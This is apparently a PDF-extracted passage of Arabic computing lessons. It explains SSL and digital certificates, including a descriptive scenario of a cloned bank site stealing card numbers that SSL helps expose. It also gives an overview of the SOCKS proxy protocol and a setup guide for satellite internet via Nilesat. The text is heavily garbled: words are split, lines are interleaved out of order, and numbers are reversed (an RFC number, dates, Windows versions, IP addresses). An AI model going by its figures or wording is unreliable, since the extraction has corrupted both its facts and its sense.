.‬الولى‪:‬ھى ان ال ‪ SSL‬توفر طرق عديده للتعرف على ھويه‬ ‫بالويب‪     ‬‬ ‫ب‬ ‫المتصل بالويب سیت و طبعا لنه من الدرورى معرفه ھويه المتصل‬ ‫ل‪     ‬‬ ‫سیت قبل بدايه تبادل المعلومات بینھم و تكون ال ‪ SSL‬مطلوبه جداا ب ال‬ ‫ل‪      ‬‬ ‫‪digital certificates‬و سنعرف ما ھى ‪ .‬و الطريقه الثانیه ھى ‪:‬انھا تحول‬ ‫المعلومات الى ‪ UNREADABLE FORMAT‬اى الى صیغه ل تستطیع قرائتھا اى‬ ‫ى‬ ‫النترنت‪                     .‬‬ ‫‪.‬‬ ‫تشفرھا عند انتقالھ ا خلل شبكه غیر امنه مثل‬ ‫اذن نرجع نقول تعريف بسیط عن ال ‪ SSL‬لتسھیل الفھم‪                     ::‬‬


‫المتصفح‪  ‬‬ ‫ح‬ ‫ھى نظام أمني يسمح للتطبیقات بتشفیر البیانات التي تنتقل من‬ ‫المقابلة‪                                                 ‬‬ ‫ة‬ ‫الى وحدة الخدمة‬ ‫و سوف نتكلم عن اشیاء كثیره فى ھذا الدرس عن ال ‪ SSL‬فسوف نتكلم عن‬ ‫ن‬ ‫لماذا‪   ‬‬ ‫ا‬ ‫قوه حمايه ھ ذا البروتوكول و سوف نتحدث ايضا عن عن كیفیه عملھا و‬ ‫ايضا‪    ‬‬ ‫ا‬ ‫تكون صلح للدفاع ضد الھاكرز و كیف تساعد الھاكرز فى بعض الحیان‬ ‫‪    Digital‬‬ ‫‪D‬‬ ‫و الن قد ذكرت كلمه اعتقد ان البعض لم يفھمھا جیدا و ھى كلمه‬ ‫‪Certificates‬و سنقوم الن بالتفسیر لمعناھا‪                               ..‬‬ ‫‪                                                      : Digital Certificates‬‬ ‫=======================‪                                   ‬‬ ‫لكى تفھم ال ‪ SSL‬جیدا يجب اول ان تفھم ال ‪ Digital Certificates‬و ھو عباره‬ ‫ه‬ ‫‪                                    281‬‬ ‫تام‪   ‬‬ ‫عن میكانزم او بروتوكول يستطیع تحديد اى شئ او التعرف علیه بوضوح م‬ ‫نحن‪     ‬‬ ‫مثل شخص او ويب سرفر فى نظام متكامل و واسع مثل النترنت ‪ .‬و ن‬ ‫المعرفه‪          ‬‬ ‫ه‬ ‫نسمى النترنت نظام مفتوح و واسع لننا ل نملك السیطره و‬ ‫ى‪ ‬‬ ‫بالشخاص الذين يستخدمون ھذا النظام‪ .‬ال ‪ Digital Certificates‬ھذا يحتوى‬ ‫بین‪       ‬‬ ‫على المعلومات الذى تحدد ھ ويه المستخدم للنظام و يؤمن التصال ن‬ ‫المستخدم و النظام ايضا كما قلنا بالتعرف الكامل على ھويته‪ .‬و يمتلك ھذا ال‬ ‫ل‬ ‫ت‪ ‬‬ ‫‪Digital Certificates‬ثلث جھات عالیه و ھم الحكومات و البنوك و و الشركات‬ ‫‪         public‬‬ ‫‪p‬‬ ‫الكبرى ‪.‬و يحتوى ال ‪ Digital Certificates‬على ما يسمى ب ال‬ ‫ه‪  ‬‬ ‫‪encryption key‬لحامل ھذا ال ‪ Digital Certificates‬سواء كان بنك او شركه‬ ‫‪...‬الخ‪                                                                    .‬‬ ‫‪.‬‬ ‫للتوضیح‪                                                    :‬‬ ‫‪:‬‬ ‫و لنعطى مثل‬ ‫ال‪       ‬‬ ‫و لنفرض ان بنك من البنوك يريد نقل معلومات بنكیه مھمه بأستخدام ل‬ ‫‪encryption‬و طبعا الن عرفنا معنى ھذه الكلمه و معناھا تشفیر و طبعا ھذه‬ ‫ه‬ ‫‪p‬‬ ‫‪public‬‬ ‫التشفیر يجب ان يكون له مفاتیح و ھذه المفاتیح ھى ما يسمى ب ال‬ ‫ل‪  ‬‬ ‫‪encryption key .‬اعتقد الن فھمنا ما ھى مفاتیح التشفیر الذى يتضمنھا ال‬ ‫ر‪   ‬‬ ‫‪Digital Certificates .‬و طبعا يجب وجود ھ ذه المفاتیح حیث ان النتقال عبر‬ ‫دون‪ ‬‬ ‫النترنت غیر امن و لذلك توجد ھذه المفاتیح لكى تؤمن وصول المعلومات ن‬ ‫المعلومات‪                 .‬‬ ‫‪.‬‬ ‫تسرب و دون معرفه الجھه الخرى التى تصل الیھا‬ ‫م‪ ‬‬ ‫و بالتالى فتجتاز ال ‪ SSL‬ھذا المانع اى تسرب المعلومات عن طريق استخدام‬ ‫ال ‪ Digital Certificates‬و على فكره الترجمه الحرفیه لھذه الكلمه ھى‪        ‬‬ ‫عالمى‪    ‬‬ ‫ى‬ ‫"شھ ادات رقمیه" و لكن من الفضل ان تتعامل معھا على انھا نظام‬ ‫‪                  SSL‬‬ ‫للتعرف على الھ ويات و التشفیر و يستخدم عن طريق ال‪S .‬‬ ‫ح‪     ‬‬ ‫و طبعا فقد فھمنا الن ان ال ‪ Digital Certificates‬يحتوى ايضا على مفاتیح‬ ‫المعلومات‪              .‬‬ ‫‪.‬‬ ‫التشفیر التى تستخدم عند الحاجه لفك التشفیر عن‬ ‫ن‪     ‬‬ ‫عندما نستخدم ال ‪ SSL‬لتشفیر اصال ب ويب سرفر معین فیكفى ان يكون‬ ‫السرفر وحده لديه ال‪  certificate.‬و يمكن للمستخدمین تعريف انفسھم للويب‬ ‫ب‬ ‫‪  SSL‬‬ ‫‪S‬‬ ‫عن طريق الیوزر نیمز و ال ‪ PIN CODES‬او الباسوردس و كما نرى ان ال‬ ‫ل‪      ‬‬ ‫‪ 3V‬الن تستطیع اعطاء الصلحیه للمستخدم بتعريف نفسه بأستخدام ال‬ ‫‪ 'client side‬‬ ‫'‬ ‫‪Digital Certificates‬اى نظام التشفیر ‪.‬و ھ ذا التعريف يسمى ب‬ ‫' ‪authentication‬اى توثیق جانب المستخدم و ھ ذا طبعا يزيد من امن الموقع‪..‬‬ ‫‪                                    381‬‬ ‫ي‪                           ‬‬ ‫شرح ‪ Ssl‬الجزء الثاني‬ ‫‪                                                             Acid Burn‬‬ ‫‪A‬‬ ‫للكاتب‪:‬‬ ‫م‪    ‬‬ ‫مره اخرى نتقابل فى الجزء الثانى من موضوع ال ‪ SSL‬اتمنى اكون اقدم لكم‬ ‫كلمه‪     ‬‬ ‫ه‬ ‫الستفاده من مواضیعى و احب ان اكتب كلمه شكر لكل من اعطانى‬ ‫يمكن‪     ‬‬ ‫ن‬ ‫تشجیع و لكل من كتب رد على موضوعى و الن دعونا نكمل الدرس‬ ‫المره‪                                                        .‬‬ ‫‪.‬‬ ‫يكون شیق ھذه‬ ‫‪                        :The Value of Server Certificates of Authentication‬‬ ‫===============================‪             ====== ‬‬


‫ل‪              ‬‬ ‫استخدام ال ‪ DIGITAL CERTIFICATES‬يسمح لل ‪ SSL‬بتقديم ال‬ ‫ى‪      ‬‬ ‫‪ authentication‬للمستخدم اى بتقديم التوثیق او الثقه بمعنى انھا تعطى‬ ‫الوعد بأن السرفر الذى يتصل به الیوزر ھو فعل السرفر الذى يريده الیوزر‪ .‬و ھذه‬ ‫ه‬ ‫بأستعمال‪     ‬‬ ‫ل‬ ‫طبعا تعتبر نقطه ھ امه جداا بالنسبه للیوزر خاصه اذا كان سیقوم‬ ‫‪    PIN CODE‬‬ ‫‪P‬‬ ‫معلومات شخصیه مھ مه مثل الكريدت كارد نمبر الخاص به او ال‬ ‫له‪                                                    .‬‬ ‫لشئ ما مھم بالنسبه ‪.‬‬ ‫يطلبه‪ ‬‬ ‫ه‬ ‫و لكن كیف حدث ان السرفر الذى يتصل به الیوزر ھو لیس السرفر الذى‬ ‫؟‪                                                                            ‬‬ ‫؟‬ ‫تكون‪ ‬‬ ‫ن‬ ‫العملیه تعتبر سھ له فى النترنت‪ .‬ففى النترنت نعرف ان الويب سرفرس‬ ‫م‪    ‬‬ ‫معروفه ب ال ‪IP‬نمبر الخاص بكل سرفر و بالنسبه لل ‪IP‬فتعريفه ھو انه رقم‬ ‫ن‪ ‬‬ ‫فريد من نوعه يسمى ‪ UNIQUE 32­BIT NUMBER‬و صعب جداا على النسان‬ ‫تذكره او حفظ كمیه كبیره منه‪ .‬ال ‪ DNS‬اى ال ‪ Domain Name System‬و‪       ‬‬ ‫ه‪      ‬‬ ‫میكانزمات اخرى كثیره تتحكم فى تنظیم و تحويل ال ‪IP‬الى اسماء سھله‬ ‫ه‪ ‬‬ ‫يستطیع النسان تذكرھا مثل ‪ 'www.internetbanking.com ' .‬ارجو من الخوه‬ ‫مراجعه موضوعى الول عن ال ‪ DNS‬لمعرفه القصه بالتفصیل‪                    ..‬‬ ‫فى‪      ‬‬ ‫و الن عندما يكتب يوزر عنوان مثل ھذا ' ‪  'www.internetbanking.com‬ى‬ ‫الموقع‪          ‬‬ ‫ع‬ ‫متصفحه و يضغط انتر تحصل عملیه معقده ليجاد ھذا السرفر او‬ ‫ذه‪ ‬‬ ‫المطلوب "راجعو الموضوع الول لمعرفه العملیه" و لكن يوجد جزء كبیر من ھ ه‬ ‫العملیه يكون دائما ما بعد تحكم الیوزر و الويب ادمنستراتور و تكون العملیه لھاا‪  ‬‬ ‫موقع‪     ‬‬ ‫ع‬ ‫قابلیه للھجوم علیھ ا من عده نقاط‪.‬بمعنى ادق انه عندما يطلب الیوزر‬ ‫ن‪ ‬‬ ‫مثل ھذا ' ‪ 'www.internetbanking.com‬اى موقع بنك اذن فھو معرض لن يكون‬ ‫نفسه‪                    .‬‬ ‫‪.‬‬ ‫متصل بسرفر يتحكم فیه مھاجم او ھاكر و لیس البنك‬ ‫توضیحا‪                                                           :‬‬ ‫‪:‬‬ ‫بمعنى اكثر‬ ‫تعتبر‪       ‬‬ ‫ر‬ ‫تخیل معى لو ان ھ اكر صمم ويب مماثل تماما دون ادنى اختلف اى‬ ‫‪                                      481‬‬ ‫ارقام‪      ‬‬ ‫م‬ ‫نسخه مطابقه الى موقع ھ ذا البنك فسوف يستعملون الیوزرس طبعا‬ ‫ط‪    ‬‬ ‫الكردت كارد و ال ‪ PIN CODES‬الخاصه بھم فى الموقع و بعد الكتابه و الضغط‬ ‫على‪     ‬‬ ‫على زر انتر لتنفیذ اى عملیه مثل تحويل مبلغ معین مثل كل ما يظھر ى‬ ‫‪ there was a technical problem with the site and "please try‬‬ ‫‪t‬‬ ‫الشاشه ھو‬ ‫س‪ ‬‬ ‫‪again later".‬اى ان ھ ناك مشكله فى السرفر و حاول مره اخرى ‪ .‬و فى نفس‬ ‫لسرقه‪      ‬‬ ‫ه‬ ‫ھذه اللحظه يكون الھ اكر قد بدء بأستخدام الرقم المكتسب الجديد‬ ‫البولیس‪    ‬‬ ‫س‬ ‫بعض الموال من الموقع الحقیقى فى راحه تامه دون اى ازعاج من‬ ‫التحدث‪   ‬‬ ‫ث‬ ‫ھ ل رأيتم كیف تكون النترنت خبیثه و ذكیه ‪ .‬و ھ ناك الكثیر مما يمكن‬ ‫الموضوع‪  ‬‬ ‫ع‬ ‫عنه و عن انواع مثل ھ ذه الختراقات و لكننا سنتركه الن و لنركز فى‬ ‫الصلى‪                                                                     .‬‬ ‫‪.‬‬ ‫ى‪   ‬‬ ‫و دور ال ‪ SSL‬ھنا ھى انھا تحاول تخطى ھذه المشكله او تحاول الوصول الى‬ ‫‪            digital‬‬ ‫‪d‬‬ ‫السرفر الحقیقى المطلوب عن طريق تخزين ال ‪ DNS‬داخل ال‬ ‫‪ certificate‬و بذلك فیقوم بالتعرف علیه بوضوح تام و بشكل صحیح‪.‬فعندما يتصل‬ ‫ل‬ ‫يوزر بموقع يستخدم ال ‪ SSL‬فیقدم السرفر الشھاده بأن ھذا العنوان موجود فى‬ ‫ى‬ ‫ه‪          ‬‬ ‫ال ‪ DNS‬الفلنى فیقارن المتصفح العنوان للموقع الذى تريده بما تحتويه‬ ‫الشھاده او ال ‪ certificate.‬و لذلك فسیكون الیوزر متأكدمن صحه الموقع و‪       ‬‬ ‫ال‪    ‬‬ ‫السرفر المتصل بھ م و اذا بالموقع فیه اى عطل فسیخبر الیوزر عن طريق ل‬ ‫‪POP­UP WINDOW‬و سیكون الیوزر متأكد من ان ھذا السرفر فعل لديه شھاده‬ ‫ه‬ ‫صحیحه‪                                                                    .‬‬ ‫‪.‬‬ ‫فى‪       ‬‬ ‫و الن تخیل معنا ثانیا لو انه حصل نوع من المھاجمه مثل الذى دكرناه ى‬ ‫البنك‪          .‬‬ ‫‪.‬‬ ‫العلى و ھو ان يكوم ھ اكر بتصمیم نسخه طبق الصل من موقع‬ ‫‪             SSL‬‬ ‫‪S‬‬ ‫للمعرفه طبعا ان الھاكر ل يعرف اى طريقه لسھله لیخدع بھا ال‬ ‫ك‪     ‬‬ ‫‪ authentication mechanism‬اى میكانزم توثیق او ثقه ال ‪ SSL‬و لذلك يترك‬ ‫الھاكر ال ‪ SSL‬جانبا دون ان يضعھ ا فى التصمیم لموقعه المطابق للبنك و و‪      ‬‬ ‫لذلك فأن موقع الھاكر ل يكون لديه شھاده من ال ‪ digital certificate‬لیكون ھو‪ ‬‬


‫ه‪  ‬‬ ‫الموقع الذى يطلبه الیوزر لن موقع البنك الصلى طبعا يستخدم ال ‪ SSL‬و لديه‬ ‫ستراه‪   ‬‬ ‫ه‬ ‫شھاده ثقه على انه ھ و فعل موقع البنك ‪.‬و يمكن الفارق الوحید الذى‬ ‫من‪        ‬‬ ‫بین الموقعین ھ ى اليقونه الصغیره التى تكلمنا عنھا فى الجزء الول ن‬ ‫ك‪      ‬‬ ‫الموضوع و ھى التى توضح ان ھ ذا الموقع محمى بواسطه ال ‪ SSL‬و لذلك‬ ‫فعلى‪      ‬‬ ‫ى‬ ‫فیكون التفريق بین موقع الھاكر و الموقع الصلى سھل جداا‪ .‬و بذلك‬ ‫المزيف‪            .‬‬ ‫‪.‬‬ ‫الیوزر ان يمتنع عن استعمال معلوماته الشخصیه فى الموقع‬ ‫د‪ ‬‬ ‫للتوضیح اكثر ‪ ,‬ان ال ‪ SSL technology‬تقدم توثیق او ثقه مؤثره جداا و لكن بعد‬ ‫اقتناع‪    ‬‬ ‫ع‬ ‫كل ھذا فنجد انه ھناك عدد غیر كاف من الیوزرس ھم فقط المقتنعین‬ ‫تام بأھمیه وجود ال ‪ SSL‬فى المواقع و لذلك يجب علینا التطوير فى انفسنا و‪   ‬‬ ‫‪                                      581‬‬ ‫تام‪      .‬‬ ‫‪.‬‬ ‫يجب علینا النتباه لمثل ھ ذه الشیاء الصغیره حتى نكون فى أمان‬ ‫اتمنى ان يكون الجزء الثانى من الموضوع نال اعجابكم ھذا الجزء الذى وضحناا‬ ‫فیه قیمه ال ‪ SSL‬و قیمه التوثیق التى تعطیه للسرفر لكى يتأكد الیوزر انه فى‬ ‫ى‬ ‫اكرز‪                                                  ‬‬ ‫أمان تام من امثل الھ ز‬ ‫‪                                  681‬‬ ‫‪                        Socks‬‬ ‫‪S‬‬ ‫ما ھو بروتوكول‬ ‫ل‬ ‫‪                                                    Smart C0d3r‬‬ ‫‪S‬‬ ‫للكاتب‪:‬‬ ‫‪                     SOCKS‬‬ ‫‪S‬‬ ‫الیوم سوف أقوم بشرح فكرة بروتوكول السوكس‬ ‫س‬ ‫نقله‪  ‬‬ ‫وآلیة العمل طبعا ھ ذا الدرس رأيته في إحدى الكتب النجلیزية فأحببته ه‬ ‫نا‪                                                               ‬‬ ‫مترجما ھ ا‬ ‫ة‪ ‬‬ ‫وفي ھ ذا الدرس راح نعرض شرح لبروتوكول ‪ Socks‬واستخدام و تطبیق أنظمة‬ ‫‪                                         Proxy gateway‬‬ ‫‪P‬‬ ‫مدخل البروكسي‬ ‫ي‬ ‫نبدأ‪                                                          ...‬‬ ‫‪.‬‬ ‫بسم االله‬ ‫­­­­­‪                                                                     ‬‬ ‫ما ھو ‪ SOCKS‬؟‪                                                         ‬‬ ‫­­­­­‪                                                                     ‬‬ ‫ة‪   ‬‬ ‫‪Socks‬ھو بروتوكول بروكسي عام لسس ‪ TCP/IP‬للستخدامات الشبكیة‬ ‫‪                                                              Networking‬‬ ‫تشمل‪   ‬‬ ‫ل‬ ‫وبروتوكول السوكس مزود بنطاق سھل لعداد اتصالت آمنة وسھلة‬ ‫أخرى‪                                              ‬‬ ‫ى‬ ‫تقنیات تكنلوجیة أمنیة‬ ‫­­­­­‪                                                                     ‬‬ ‫كیف يعمل ‪ SOCKS‬؟‪                                                     ‬‬ ‫­­­­­‪                                                                     ‬‬ ‫‪A‬‬ ‫‪Application‬‬ ‫عندما يحتاج تطبیق (برنامج (مستخدم ما التصال مع تطبیق خادم‬ ‫‪                                                                   Server‬‬ ‫‪             Socks Proxy Server‬‬ ‫‪S‬‬ ‫فإن جھ از المستخدم يقوم بالتصال بواسطة‬ ‫ة‬ ‫والبیانات‪ ‬‬ ‫ت‬ ‫طبعا بروكسي الخادم يتصل بتطبیق الخادم بالنیابة عن (المستخدم‬ ‫الخادم)‪                                  ‬‬ ‫)‬ ‫المتبادلة بین المستخدم وتطبیق‬ ‫المستخدم‪                 ‬‬ ‫م‬ ‫وأيضا نعلم أن لتطبیق الخادم بروكسي خادم ھو‬ ‫­­­­­‪                                                                     ‬‬ ‫‪                                                         SOCKS‬‬ ‫‪S‬‬ ‫ل‬ ‫بروتوكول‬ ‫­­­­­‪                                                                     ‬‬ ‫ت‪  ‬‬ ‫الصدارة الخامس لـ ‪ SOCKS‬اعتمدته ‪ IETF‬أي اللجنة الخاصة لنظام النترنت‬ ‫‪                       (RFC‬‬ ‫(‬ ‫واعتبرته كمبدأ بروتوكول تنفیذي تطبیقي(‪8291‬‬ ‫‪                                   781‬‬ ‫س‪        ‬‬ ‫يتضمن ‪ SOCKS‬كائنین ھما خادم السوكس و مستخدم السوكس‬ ‫تطبیق‪                        ‬‬ ‫ق‬ ‫خادم السوكس قد ُبق (نفذ) على طبقة‬ ‫ط‪                                                  ‬‬ ‫ط‬ ‫الغرض‪   ‬‬ ‫ض‬ ‫بینما مستخدم السوكس قد ُبق بین التطبیق وطبقات الرسال‬ ‫ط‪                                          ‬‬ ‫ط‬


‫الساسي من ھذا البروتوكول ھو السماح للمضیفین ‪ hosts‬من جانب واحد‬ ‫د‬ ‫السوكس‪                                                  ‬‬ ‫س‬ ‫على خادم‬ ‫‪ Socks‬‬ ‫‪S‬‬ ‫من الحصول على تصريح للدخول للجانب الخر من خادم السوكس‬ ‫‪                                                                Server‬‬ ‫‪                               “IP­reachability‬‬ ‫‪I‬‬ ‫بدون أمر أو طلب مباشر”‬ ‫­­­­­‪                                                                   ‬‬ ‫‪                               OSI‬‬ ‫ة ‪O‬‬ ‫صورة توضیخیة لـ ‪ Socks‬ونموذج طبقة‬ ‫­­­­­‪                                                                   ‬‬ ‫آخر‪                            ‬‬ ‫الموضوع له تكملة ان شا االله في موضوع ر‬ ‫بالعربي‪                     ‬‬ ‫ي‬ ‫وطبعا صعب أني أشرح مصطلحات انجلیزية‬ ‫وم‪          ‬‬ ‫وبالنسبة لي أنا فاھم الموضوع أما إن كان الموضوع غیر مفھ م‬ ‫نا‪                ‬‬ ‫بإمكانك تنزيل الكتاب النجلیزي عن الموضوع ھذا من ھ ا‬ ‫‪                          http://m­arab.org/uploads/697857aa9a.zip‬‬ ‫­­­­­­‪                                                                 ‬‬ ‫‪                                                         Socks‬‬ ‫‪S‬‬ ‫ف‬ ‫وضائف‬ ‫­­­­­­‪                                                                 ‬‬ ‫يقوم بروتوكول ‪ Socks‬بأربعة وضائف ھي كالتي‪                        ::-‬‬ ‫‪                    connection requests‬‬ ‫‪c‬‬ ‫*تحديد وإعداد طلبات التصال‬ ‫ل‬ ‫‪       proxy circuits‬‬ ‫‪p‬‬ ‫*تھ یئة وإعداد بروكسي غیر مباشر أو ما يسمى بــ‬ ‫‪                                application data‬‬ ‫‪a‬‬ ‫*متابعة بیانات التطبیق‬ ‫ق‬ ‫(اختیاري)‪                                 ‬‬ ‫)‬ ‫*التحقق من أداء المستخدم‬ ‫‪                                881‬‬ ‫­­­­­­‪                                                                ‬‬ ‫‪                                                 Socks‬‬ ‫‪S‬‬ ‫ممیزات وخواص‬ ‫ص‬ ‫­­­­­­‪                                                                ‬‬ ‫المتعددة‪ ‬‬ ‫ة‬ ‫الوصول المصرح به للشبكة بوضوح عبر أجھ زة و خوادم البروكسي‬ ‫‪                                                       Proxy servers‬‬ ‫والتشفیر‪                               ‬‬ ‫ر‬ ‫النتشار السھل لطرق التحقق‬ ‫الجديدة‪                             ‬‬ ‫ة‬ ‫النتشار السريع لتطبیقات الشبكة‬ ‫‪                  Simple Network‬‬ ‫‪S‬‬ ‫سیاسة الدارة وأمن الشبكة البسیطة‬ ‫ة‬ ‫­­­­­­‪                                                                ‬‬ ‫‪                                                          Socks‬‬ ‫‪S‬‬ ‫د‬ ‫فوائد‬ ‫­­­­­­‪                                                                ‬‬ ‫‪c‬‬ ‫‪communication‬‬ ‫نظام إتصال منفرد يوثق المستخدمین ويؤسس قناة إتصال‬ ‫‪                                                             channel‬‬ ‫ل‪                                       ‬‬ ‫‪Socks‬ھو تطبیق برنامج مستقل‬ ‫يمكن استخدامه إما مع ‪ UDP‬أو ‪ TCP‬مستندا على بروتوكولت تدعم توجیھا‬ ‫‪                                                        ICMP‬‬ ‫‪I‬‬ ‫زوجیا للــ‬ ‫ع‪    ‬‬ ‫دعم ثنائي اتجاھي و ‪ NAT‬حقیقي أساسي لضافة المان وقتل الخداع‬ ‫‪                                    security and anti­spoofing‬‬ ‫‪s‬‬ ‫ش‬ ‫والغش‬ ‫­­­­­­‪                                                                ‬‬ ‫الخلصة‪                                                             ‬‬ ‫ة‬ ‫­­­­­­‪                                                                ‬‬ ‫ة‪     ‬‬ ‫‪ Socks‬مرتكز على اللجنة الخاصة لنظام النترنت ‪ IETF‬ومعايیر صناعیة‬ ‫ة‪                                         ‬‬ ‫ٍ ‪Socks‬سھل للنتشار والدارة‬ ‫ن‪              ‬‬ ‫‪Socks‬واضح للمستخدم بینما ھو مزود بطبقات متعددة وآمن‬ ‫‪                            Socks‬‬ ‫‪S‬‬ ‫إلى ھنا أنھي موضوعي عن بروتوكول‬ ‫ل‬ ‫المجال‪               ‬‬ ‫ل‬ ‫وأتمنى أن أكون قد أفدتكم ولو بشيء قلیل في ھذا‬ ‫‪                               981‬‬ ‫‪                    201‬‬ ‫‪2‬‬ ‫توصیل النترنت بنايل سات‬


‫من‪       ‬‬ ‫ينطلق ھذا الیوم ‪ 81/8/0002‬القمر الصناعي المصري نايل سات ‪ 201‬ن‬ ‫‪ 08‬‬ ‫فرنسا وھ و أمل عظیم كنا ننتظره منذ قديم الزمن ويضم ھذا القمر أكثر من ‪0‬‬ ‫خاصة‪        ‬‬ ‫ة‬ ‫قناة خاصة بنقل المعلومات عبر النترنت ‪ ،‬ويحتوي القمر على قناة‬ ‫ما‪    ‬‬ ‫للبورصة العالمیة والسواق المالیة ‪ ،‬وقناة أخرى خاصة بالتسوق ‪ ،،،،‬لكن ا‬ ‫ريسفر‪     ‬‬ ‫ر‬ ‫يھمنا ھنا ھ و النترنت ‪ .‬يجب أن يكون لديك التجھیزات التالیة ‪ :‬جھاز‬ ‫‪C‬‬ ‫‪COM‬‬ ‫رقمي يحمل فتحتي ‪ PCMCI‬على القل ‪ ،‬ويحتوي على فتحة من الخلف‬ ‫ط‪  ‬‬ ‫‪  PORT‬طبق قطره متر على القل يوجد علیه رأس موجه ب ‪ 7‬درجات غرب خط‬ ‫‪   PCMCI ETHERNET‬‬ ‫‪P‬‬ ‫الستواء ‪ ،،،،‬كیبل ‪ SMART CABL‬أو ‪ CABL LINK‬بطاقة‬ ‫‪           AOL‬‬ ‫‪A‬‬ ‫‪ 001/01‬جھاز كمبیوتر ‪ .‬متصفح اكسبلورر ‪ .‬اشتراك في ‪ MSN‬أو‬ ‫ن‪   ‬‬ ‫أول ‪ :‬برمج الرأس على الطبق على ‪ 7‬درجات غرب خط الستواء ‪ .‬إذا لم يكن‬ ‫لديك خبره في ذلك اتصل بالمھندس الذي ركب لك الدش ‪                    ..‬‬ ‫ب‪    ‬‬ ‫ثانیا ‪ :‬ابحث عن قناة ‪ : INTERNET DATA‬إذا لم تجدھا يجب علیك أن تكتب‬ ‫ت‪   ‬‬ ‫التردد الخاص بھ ا ‪ ،‬إذا كنت في السعودية فالتردد ھو ‪ 2021-2001 :‬وإذا كنت‬ ‫القناة‪ ‬‬ ‫ة‬ ‫في دولة أخرى فأكتب اسم دولتك في الردود وسأرسل لك مباشرة تردد‬ ‫في دولتك التي أنت فیھا ‪                                                    ..‬‬ ‫بالبحث‪ ‬‬ ‫ث‬ ‫ملحظة ‪( :‬أنصح جمیع المستخدمین بكتابة التردد يدويا وعدم القتناع‬ ‫التوماتیكي لسباب سأطرحھا لحقا ))‪                                          ‬‬ ‫أحصل‪  ‬‬ ‫ل‬ ‫ثالثا ‪ :‬يجب أن يكون في جھاز الريسفر لديك فتحة لمسار كرت ‪PCMCI‬‬ ‫‪     ETHERNET CARD‬‬ ‫‪E‬‬ ‫على كرت ‪ PCMCI‬ويفضل أن يكون من ‪ 3COM‬مودم أو‬ ‫‪                       11RG‬‬ ‫‪1‬‬ ‫كلھ ما ينفع لكن يجب أن يكون في الكرت فتحة ‪.‬‬ ‫ي‪      ‬‬ ‫رابعا ‪ :‬أدخل ھ ذه البطاقة بفتحة الريسفر السريعة ( ايردتو ) ملحظة ھي‬ ‫‪              (ART AND SHOWTAIME‬‬ ‫(‬ ‫نفس الفتحة التي تعمل علیھا كروت‪( .‬‬ ‫خامسا ‪ :‬شغل قناة النترنت بالتردد الذي ذكرته تماما ‪                        ..‬‬ ‫ك‪ ‬‬ ‫سادسا ‪ :‬أحضر وصلة ھاتف لھا رأسین ‪11 RG‬اشبك الول بالمودم في جھازك‬ ‫‪                                    PCMCI‬‬ ‫‪P‬‬ ‫‪ ،‬واشبك الرأس الثاني في الكرت ‪.‬‬ ‫‪        SEREAL‬‬ ‫‪S‬‬ ‫ملحظة مھمة ‪ :‬يجب أن تكون الفارة في جھازك ‪2 PS‬ولیست ‪.‬‬ ‫سابعا ‪ :‬يوجد لديك فتحة ‪ SEREAL‬في الجھاز ‪ ،‬اذھب إلى خصائص المذربوردد‪   ‬‬ ‫ل‪    ‬‬ ‫واجعل تلك الفتحة تحمل ‪ 1 ، COM‬وانقل المودم إلى منفذ آخر إذا كان يحمل‬ ‫نفس المنفذ ‪                                                                 ..‬‬ ‫ه‪    ‬‬ ‫ثامنا ‪ :‬أحضر ‪ LINK CABL‬واربطه بجھاز الكمبیوتر ( وھو مطفأ ) واجعل رأسه‬ ‫‪                                      091‬‬ ‫الثاني في فتحة ‪ COM‬الموجودة خلف الريسفر ‪                                .‬‬ ‫ملحظة مھ مة قبل التشغیل ‪ :‬يجب أن يكون الويندوز لديك ھو ويندوز ان تي أوو‬ ‫ويندوز ‪ 89‬الصدار الثاني ‪ ،‬ويجب أن يكون لديك اكسبلورر ‪                   . 5‬‬ ‫ولكن تأكدوا من المور التالیة ‪                                                   ::‬‬ ‫نسخة ويندوز ‪ 89‬الصدار الثاني ‪                                              .‬‬‫‪                      ( FULL INSTALL‬‬ ‫(‬ ‫تحمیل اكسبلورر ‪ 5‬مع كافة أدواته ‪( .‬‬‫‪                                                     MSN OR AOL‬‬ ‫‪M‬‬ ‫اشتراك في‪.‬‬‫والحلقة‪     ‬‬ ‫ة‬ ‫سیكون ھ ذا الجزء على حلقتین ‪ :‬الحلقة الولى تجھیز الكمبیوتر ‪،‬‬ ‫الثانیة تجھیز الريسفر ‪                                                            ..‬‬ ‫الحلقة الولى ‪ :‬تجھیز الكمبیوتر ‪                                                ::‬‬ ‫ثم‪      ‬‬ ‫أول إضغط على زر ( جوار شبكة التصال بالزر اليمن ) ثم اختر خصائص م‬ ‫م‪    ‬‬ ‫اذھب الى بروتوكول ‪ TCP/IP‬الملحق بكرت الشبكة لديك واختر خصائص ثم‬ ‫ول‪      ‬‬ ‫تأكد من المور التالیة ‪ :‬عنوان الجھاز في الوضع تلقائي ( ‪  ( DISABLE‬ل‬ ‫يحمل أي رقم ‪ ....‬في خانة عبارة ) أضف العبارات التالیة ‪                   (( :‬‬ ‫‪ ) 001.861.861.291‬و‪                                                             ‬‬ ‫ق‪                                             ‬‬ ‫‪ .. 1.001.861.291‬ثم اضغط موافق‬ ‫ت‪  ‬‬ ‫اذا كان لديك الصدار الثاني من ويندوز ‪ 89‬فاحذف بروتوكول مشاركة النترنت‬ ‫إزالة‪                             ‬‬ ‫ة‬ ‫إذا كان موجودا ضع علیه مؤشر الفارة ثم اختر‬ ‫‪A‬‬ ‫‪ATM LAN‬‬ ‫اختر بعد ذلك إضافة < بروتوكول < مايكروسوفت < عمیل ومضاھاة‬


‫سیطلب منك بعد ذلك قرص ويندوز أدخل القرص ثم أعد التشغیل ‪            ..‬‬ ‫بعد إعادة التشغیل إفتح اكسبلورر ‪ 5‬واختر أدوات < خیارات انترنت < عام <‪   ‬‬ ‫إعدادات < أبدا < موافق ‪                                                        ..‬‬ ‫ثم اذھب إلى صفحة البداية واجعلھا ‪ http://www.msn.com / :‬لحظ وجود ‪ :‬‬ ‫( ‪(HTTP‬ثم تطبیق ثم موافق ‪                                                   .‬‬ ‫وانتظر‪   ‬‬ ‫ر‬ ‫اتصل الن بالنترنت عن طريق اشتراكك العادي عن طريق خط المودم‬ ‫ة‪    ‬‬ ‫حتى يفتح صفحة ‪ MSN‬كاملة بجمیع عناصرھا ‪ .‬وتاكد أنھا الصفحة الحديثة‬ ‫بالضغط على مفتاح ‪ 5 F ....‬اقطع التصال بالنترنت واترك الصفحة مفتوحة ‪     .‬‬ ‫اذھب إلى إدارة الجھ زة في لوحة التحكم وتأكد أن كرت الشبكة ‪ 01/001‬ل‪    ‬‬ ‫يتعارض مع أيه أجھ زة أخرى ‪ .‬يجب أن تكون الفارة لديك على مخرج ‪ 